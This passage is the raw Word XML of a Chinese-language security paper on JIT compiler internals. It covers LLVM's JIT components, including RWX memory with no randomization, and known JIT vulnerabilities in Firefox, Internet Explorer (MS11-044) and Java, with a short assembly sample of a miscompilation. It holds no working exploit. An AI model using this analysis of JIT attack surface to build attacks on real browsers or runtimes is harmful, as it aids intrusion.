          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>并处理代码发出的详细</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>信息，例如缓冲区管理，重定位，常量和跳转表。</w:t>
      </w:r>
      <w:r>
        <w:t>这样，将维护JITMemoryManager，JITResolver，对JIT引擎的引用以及指向当前正在发射的位置的指针。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A353526" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="714"/>
        </w:tabs>
        <w:spacing w:before="4"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JITResolver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>lib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ExecutionEngine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> / JIT / JITEmitter.cpp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3644AA7A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1374"/>
        </w:tabs>
        <w:spacing w:before="17" w:line="266" w:lineRule="auto"/>
        <w:ind w:right="836" w:hanging="360"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JITResolver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>维</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>护和解析尚未编译的函数和代码块的调用站点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034CE297" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="714"/>
        </w:tabs>
        <w:spacing w:before="5" w:line="273" w:lineRule="auto"/>
        <w:ind w:right="1183" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JITMemoryManager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DefaultJITMemoryManager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>lib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ExecutionEngine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:position w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> / J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>IT / JITMemoryManager.cpp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379D6D48" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1374"/>
        </w:tabs>
        <w:spacing w:line="236" w:lineRule="exact"/>
        <w:ind w:left="1373" w:hanging="133"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>分配，取消分配和维护用于代码的内存平板</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D76465D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="27" w:line="266" w:lineRule="auto"/>
        <w:ind w:left="1600" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>排放。将所有内存标记为RWX，并且不会尝试随机化或以其他方式保护内存位置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D763B26" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="266" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC7E0B8" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="1337"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FBA34F7" wp14:editId="658EC098">
            <wp:extent cx="4291087" cy="331470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4291087" cy="3314700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E04CA5D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08D40B42" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49C0A2AA" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2D3CBB" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="287FBE22" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="89"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_bookmark7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ADDCEB" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="38"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7400F08B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在过去的几年中，向供应</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>商报告</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的JIT漏洞数量有所增加。 JIT引擎中的安全性漏洞的吸引力显而易见：它们可以允许失败的开放逻辑，信息泄漏或直接执行任意代码。 JIT引擎需要许多复杂的组件，每个组件都将中间目标代码表示和优化传播到下一个。在多个组件之间的这种复杂逻辑流失去同步的情况下，不可避免地存在安全漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63190825" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="525A52D3" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="425"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>尽管编译器产生错误代码的概念并不是什么新鲜事物，但JIT引擎通过在运行时执行此编译（而可能会受到不受信任的输入的影响）而增加了风</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>险。 CW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>E（通用弱点枚举）指南仅提及编译相关的漏洞[7]。此CWE条目涉及编译器，该编译器优化了开发人员插入的安全检查。复杂的JIT引擎关心的一个问题是，编译器将在运行时通过错误计算代码位置，错误处理寄存器状态或错误的指针取消引用等方式生成错误的代码。这里潜在的漏洞数量很容易成为整个研究工作的主题。但是，在现实世界中有许多此类漏洞的例子。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E284B41" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ADBFE51" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="567"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>我们的第一个示例是2011年2月在Mozilla Firefox 4 Beta中发现的错误（Bugzilla条目635295 [3]）。此问题导致JIT发出的本机代码采用了错误的分支，这显然具有安全性，但是错误未标记为与安全相关。该错误是由于快速路径与本机嵌入式缓存链接到已被垃圾回收的对象而造成的。在此漏洞中，不受信任的JavaScript影响了本机代码的流，并可能直接导致任意代码执行，而无需使用内存损坏漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B82D17" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A67FA8" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="515"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JIT漏洞也表现为难以检测到逻辑错误，例如MS11-044 [4]。在此漏洞中，JIT引擎错误地假定对象始终为NULL或非NULL。尽管在实践中不太可能发生，但是在某些情况下有可能，该错误可能会导致打开失败的情况，从而导致诸如身份验证绕过之类的行为。对这些类型的漏洞进行模糊检查非常困难，并且如果没有合适的工具，手动检查JIT生成的本机代码也是一个繁琐的过程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167C21A2" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3322EFE9" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Java最近修补了一个漏洞[5]，其中x64 JIT引擎错误地产生了以下代码序列：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5A8FFD" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5352CEA7" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>预期的代码发射</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACEAC2B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="31"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55AFBCBF" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2751"/>
        </w:tabs>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>addq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>（％</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0xffffff2b</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0xffffff2b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>添加到％</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>指向的位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E8BE08" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2751"/>
        </w:tabs>
        <w:spacing w:before="36" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="1461"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>popfq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>从堆栈中弹出</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>位，将低</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>位加载到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>RFLAGS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CF2028" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D1183E8" w14:textId="73D0709B" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>意外的代码</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004D275C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FE5244" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="31"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EA6E5A0" w14:textId="07B228AB" w:rsidR="0026102A" w:rsidRDefault="004D275C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2535"/>
        </w:tabs>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ddq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>％</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0xffffff2b</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0xffffff2b</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>添加到％</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C40CAF" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2535"/>
        </w:tabs>
        <w:spacing w:before="16"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>popfq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>从堆栈中弹出</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>位，将低</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
